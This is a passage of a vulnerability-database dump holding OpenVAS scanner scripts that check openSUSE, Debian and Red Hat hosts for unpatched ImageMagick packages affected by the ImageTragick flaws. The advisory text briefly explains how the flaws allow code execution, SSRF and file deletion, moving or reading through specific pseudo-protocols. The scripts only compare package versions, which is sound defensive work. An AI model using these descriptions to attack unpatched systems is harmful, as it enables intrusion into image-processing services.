PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851304\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:07 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1261-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\n CVE-2016-3718\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1261-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5\", rpm:\"libMagick++-6_Q16-5~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo\", rpm:\"libMagick++-6_Q16-5-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2\", rpm:\"libMagickCore-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo\", rpm:\"libMagickCore-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2\", rpm:\"libMagickWand-6_Q16-2~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo\", rpm:\"libMagickWand-6_Q16-2-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-32bit\", rpm:\"libMagick++-6_Q16-5-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-5-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-5-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-32bit\", rpm:\"libMagickCore-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-32bit\", rpm:\"libMagickWand-6_Q16-2-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-2-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-2-debuginfo-32bit~6.8.9.8~18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.", "modified": "2017-07-07T00:00:00", "published": "2016-05-16T00:00:00", "id": "OPENVAS:703580", "href": "http://plugins.openvas.org/nasl.php?oid=703580", "type": "openvas", "title": "Debian Security Advisory DSA 3580-1 (imagemagick - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3580.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703580);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_name(\"Debian Security Advisory DSA 3580-1 (imagemagick - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-05-16 00:00:00 +0200 (Mon, 16 May 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3580.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"imagemagick on Debian Linux\");\n script_tag(name: \"insight\", value: \"ImageMagick is a software suite\nto create, edit, and compose bitmap images. It can read, convert and write\nimages in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000,\nPDF, PhotoCD, PNG, Postscript, SVG, and TIFF. Use ImageMagick to translate, flip,\nmirror, rotate, scale, shear and transform images, adjust image colors, apply various\nspecial effects, or draw text, lines, polygons, ellipses and Bzier curves.\nAll manipulations can be achieved through shell commands as well as through\nan X11 graphical interface (display).\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these\nproblems have been fixed in version 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name: \"summary\", value: \"Nikolay Ermishkin from the Mail.Ru Security\nTeam and Stewie discovered several vulnerabilities in ImageMagick, a program suite for\nimage manipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code\n(CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718),\nor delete (CVE-2016-3715), move\n(CVE-2016-3716), or read\n(CVE-2016-3717 \n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libimage-magick-q16-perl\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-arch-config:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6-headers\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-2:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:amd64\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-6.q16-dev:i386\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.8.9.9-5+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:35:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310851305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851305", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851305\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:13 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing '/etc/ImageMagick-*/policy.xml' (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"ImageMagick on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1266-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-debugsource\", rpm:\"ImageMagick-debugsource~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra\", rpm:\"ImageMagick-extra~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-extra-debuginfo\", rpm:\"ImageMagick-extra-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3\", rpm:\"libMagick++-6_Q16-3~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo\", rpm:\"libMagick++-6_Q16-3-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel\", rpm:\"libMagick++-devel~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1\", rpm:\"libMagickCore-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo\", rpm:\"libMagickCore-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1\", rpm:\"libMagickWand-6_Q16-1~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo\", rpm:\"libMagickWand-6_Q16-1-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick\", rpm:\"perl-PerlMagick~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-PerlMagick-debuginfo\", rpm:\"perl-PerlMagick-debuginfo~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-devel-32bit\", rpm:\"ImageMagick-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-32bit\", rpm:\"libMagick++-6_Q16-3-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-6_Q16-3-debuginfo-32bit\", rpm:\"libMagick++-6_Q16-3-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagick++-devel-32bit\", rpm:\"libMagick++-devel-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-32bit\", rpm:\"libMagickCore-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickCore-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickCore-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-32bit\", rpm:\"libMagickWand-6_Q16-1-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libMagickWand-6_Q16-1-debuginfo-32bit\", rpm:\"libMagickWand-6_Q16-1-debuginfo-32bit~6.8.8.1~9.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-05-10T00:00:00", "id": "OPENVAS:1361412562310871609", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871609", "type": "openvas", "title": "RedHat Update for ImageMagick RHSA-2016:0726-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ImageMagick RHSA-2016:0726-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 